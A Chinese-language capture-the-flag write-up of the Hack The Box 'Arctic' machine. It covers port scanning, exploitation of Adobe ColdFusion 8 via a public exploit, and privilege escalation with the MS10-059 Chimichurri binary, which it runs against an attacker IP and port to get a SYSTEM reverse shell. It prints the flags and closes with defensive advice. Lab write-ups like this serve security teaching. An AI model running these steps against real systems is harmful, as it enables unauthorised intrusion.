[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature for Services Could权限提升
字数 1178 2025-08-29 08:30:30

Arctic Adobe ColdFusion 8 RCE + MS10-059 权限提升技术分析

1. 目标信息收集

1.1 初始扫描

目标IP: 10.10.10.11

开放端口:

  • 135/tcp - Microsoft Windows RPC
  • 8500/tcp - 疑似Adobe ColdFusion管理端口
  • 49154/tcp - Microsoft Windows RPC

1.2 扫描命令

ip='10.10.10.11'; itf='tun0';
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
  echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
  ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//');
  if [ -n "$ports" ]; then
    echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
    nmap -Pn -sV -sC -p "$ports" "$ip";
  else
    echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
  fi;
else
  echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi

2. Adobe ColdFusion 8 RCE漏洞利用

2.1 漏洞确认

发现目标运行Adobe ColdFusion 8,管理界面位于:

  • http://10.10.10.11:8500/CFIDE/administrator/

2.2 漏洞利用

使用公开的Exploit-DB漏洞利用代码:

  • Exploit-DB ID: 50057
  • 链接: https://www.exploit-db.com/exploits/50057

2.3 利用步骤

  1. 访问ColdFusion管理界面
  2. 利用认证绕过或默认凭证(如果未更改)
  3. 通过文件上传或模板注入执行远程代码

2.4 获取初始权限

成功利用后获取user.txt内容:

28cec91860c0151792d28e1e925165d5

3. 权限提升(MS10-059)

3.1 系统信息收集

在获取初始shell后,收集系统信息:

systeminfo > systeminfo.txt

3.2 漏洞分析工具

使用windows-exploit-suggester.py分析可能的漏洞:

python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2025-02-26-mssb.xls --systeminfo systeminfo.txt

3.3 MS10-059 (Chimichurri)漏洞利用

  1. 下载漏洞利用程序:

    • https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe
  2. 执行利用:

    X:\> .\Chimichurri.exe
    X:\> .\Chimichurri.exe 10.10.16.33 10032
    

3.4 获取系统权限

成功提权后获取root.txt内容:

ffae96561e8c4f1ee1c56e7be7c752d9

4. 技术要点总结

  1. ColdFusion 8 RCE:

    • 利用管理界面漏洞获取初始访问权限
    • 可能涉及认证绕过或默认凭证利用
  2. MS10-059 (Chimichurri):

    • Windows服务追踪功能中的漏洞
    • 允许本地权限提升至SYSTEM
    • 需要将利用程序上传至目标系统执行
  3. 工具链:

    • 信息收集: nmap, masscan
    • 漏洞分析: windows-exploit-suggester.py
    • 漏洞利用: 公开的Exploit-DB代码和GitHub上的编译版本

5. 防御建议

  1. 针对ColdFusion:

    • 升级到最新版本
    • 修改默认管理凭证
    • 限制管理界面的访问IP
  2. 针对MS10-059:

    • 应用Microsoft安全补丁
    • 禁用不必要的服务追踪功能
    • 实施最小权限原则
  3. 通用防御:

    • 定期更新系统和应用补丁
    • 监控异常网络活动
    • 实施严格的访问控制策略
Arctic Adobe ColdFusion 8 RCE + MS10-059 权限提升技术分析 1. 目标信息收集 1.1 初始扫描 目标IP: 10.10.10.11 开放端口: 135/tcp - Microsoft Windows RPC 8500/tcp - 疑似Adobe ColdFusion管理端口 49154/tcp - Microsoft Windows RPC 1.2 扫描命令 2. Adobe ColdFusion 8 RCE漏洞利用 2.1 漏洞确认 发现目标运行Adobe ColdFusion 8,管理界面位于: http://10.10.10.11:8500/CFIDE/administrator/ 2.2 漏洞利用 使用公开的Exploit-DB漏洞利用代码: Exploit-DB ID: 50057 链接: https://www.exploit-db.com/exploits/50057 2.3 利用步骤 访问ColdFusion管理界面 利用认证绕过或默认凭证(如果未更改) 通过文件上传或模板注入执行远程代码 2.4 获取初始权限 成功利用后获取user.txt内容: 3. 权限提升(MS10-059) 3.1 系统信息收集 在获取初始shell后,收集系统信息: 3.2 漏洞分析工具 使用windows-exploit-suggester.py分析可能的漏洞: 3.3 MS10-059 (Chimichurri)漏洞利用 下载漏洞利用程序: https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe 执行利用: 3.4 获取系统权限 成功提权后获取root.txt内容: 4. 技术要点总结 ColdFusion 8 RCE : 利用管理界面漏洞获取初始访问权限 可能涉及认证绕过或默认凭证利用 MS10-059 (Chimichurri) : Windows服务追踪功能中的漏洞 允许本地权限提升至SYSTEM 需要将利用程序上传至目标系统执行 工具链 : 信息收集: nmap, masscan 漏洞分析: windows-exploit-suggester.py 漏洞利用: 公开的Exploit-DB代码和GitHub上的编译版本 5. 防御建议 针对ColdFusion : 升级到最新版本 修改默认管理凭证 限制管理界面的访问IP 针对MS10-059 : 应用Microsoft安全补丁 禁用不必要的服务追踪功能 实施最小权限原则 通用防御 : 定期更新系统和应用补丁 监控异常网络活动 实施严格的访问控制策略